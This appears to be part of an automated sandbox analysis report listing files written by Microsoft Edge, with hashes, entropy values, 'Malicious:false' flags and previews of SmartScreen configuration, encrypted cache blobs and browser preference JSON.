                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.014683326093359
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTCKgu:YWLSGTt1o9LuLgfGBPAzkVj/T8l+Kgu
                                                                                                                                                                                                                                                                                  MD5:8508E7601B3A1B078C0D41F140C00AD0
                                                                                                                                                                                                                                                                                  SHA1:963E58DE586E9B66B0BB0F509BD7791013BE3414
                                                                                                                                                                                                                                                                                  SHA-256:DE001576B5E3EC88870596BF0E23E34639A85F126DFE09DBD1C94050713C88A3
                                                                                                                                                                                                                                                                                  SHA-512:F4E91FAA42DF9AD8B799EA1128D4DEA2875FADD5427FBE10C900AE154C30A7B9AEE51E067F31FE28BE102660A7122E51D2BE54C937EA44260F95C4CC1D56D6F3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736044360617640}]}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.415446034314543
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQOn:YQ3Kq9X0dMgAEwjMn
                                                                                                                                                                                                                                                                                  MD5:3510D75E3E337288072C8BD809648DAB
                                                                                                                                                                                                                                                                                  SHA1:68AA422E13FD4CFD9D2DF41C4C2C980D1A1BEC51
                                                                                                                                                                                                                                                                                  SHA-256:7E6DAAD7C6A4C97ABCD6A0D03EE9D31D736E1F427084384E37058CCFFC80187A
                                                                                                                                                                                                                                                                                  SHA-512:E772639EC9588F16550DED4BB55162D9E664D653C459E63DAC58A0F2BA950EBD55977C0EAC8C1ECC2D6C15F052E401EAEEA482C0082E34EB7D821ABBC254C56E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":15}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):27869
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.03421626565474
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNjhaJKoKNEuJ5Rap0zm8T35ub/Y3jFd46:5MkbJrT8IeQc5dUpjSKy0zm8L5uTY3JX
                                                                                                                                                                                                                                                                                  MD5:396CE20EAB9C432698A0D3D649C44F33
                                                                                                                                                                                                                                                                                  SHA1:A90E29D68D6F2EEECB8F4A763DDFB293C68E1F83
                                                                                                                                                                                                                                                                                  SHA-256:413E258738D6C29720C0500F629067E11DE78FDBC6814B7115F1B68BA88F1960
                                                                                                                                                                                                                                                                                  SHA-512:DFC82D3AACF6A97502B9DCE066F8DFFC7EF256AA64EB2FC104CAB9B1E8EBF7B577D981A599BCEF97E0F09540FF8DEE8448101BD05CEDAD2723DBC5D909890794
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):24023
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.0480187905455995
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhaJKoG0uf93fT35ub/Y3jFd46:5MkbJrT8IeQc5d1pkuf93fL5uTY3JX
                                                                                                                                                                                                                                                                                  MD5:0687031D6577008CC5DF45A97C41D3B6
                                                                                                                                                                                                                                                                                  SHA1:42588365F4FCF3E6B956C3DE9EF575886CCFFE32
                                                                                                                                                                                                                                                                                  SHA-256:A06D86F48C7BD821CF22EE33836EC78F7BBA8E775E7D05779C0A47224D2BC848
                                                                                                                                                                                                                                                                                  SHA-512:E6DB028266B49F04DEB65B10E315EF5044A9A3F3C33E9557F289975F099CE29E42F8011EDA83C90F861399BB93DBA6DAF75F87BE7E18EC73708D18F78E88B4B1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):27830
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.034792382366105
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:ztMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNihaJKoKNEuJ5Rap0zm8T35ub/Y3jFd46:5MkbJrT8IeQc5dDpjSuy0zm8L5uTY3JX
                                                                                                                                                                                                                                                                                  MD5:EC1025F6E871A92655F2F213C9071143
                                                                                                                                                                                                                                                                                  SHA1:B845EF48C57E601A3B55911601EB50682661CAA6
                                                                                                                                                                                                                                                                                  SHA-256:179A9723D9D9120D00CDF13E21F9BA0409414AC42FA0FA4CE1927AED77D2DBD4
                                                                                                                                                                                                                                                                                  SHA-512:B836FFECEDE66E40FFAEBD5061E458C5561C573EFB05F95473E2411672A50355444F3231ACE191BB0EE350FAE69174BC096EE946CA8D339D7AE5777060F2AEBD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380417156830918","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1735943561"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.806252236488507
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:asNAkLXeiRUbFQbk9Q6qRAq1k8SPxVLZ7VTiq:asNAkLCaY9Q6q3QxVNZTiq
                                                                                                                                                                                                                                                                                  MD5:D0EC61A30DE62CB7D6C65F4416C16452
                                                                                                                                                                                                                                                                                  SHA1:271301C652FB6676490575BFFA54B47AFA4C2A6E
                                                                                                                                                                                                                                                                                  SHA-256:BD1E215B13C860FBB7C1D6CF08D27E86BA23FDA65AEA200685139467E1E8DEF4
                                                                                                                                                                                                                                                                                  SHA-512:0455E40B7956CBE476316B65196790AD637927346D821D18031D9302526A39FB3C2341F81C21DDBB15DBBACAAE098F8D6B68BD12060C744E5D33B0688BAC0B91
                                                                                                                                                                                                                                                                                  Malicious:false
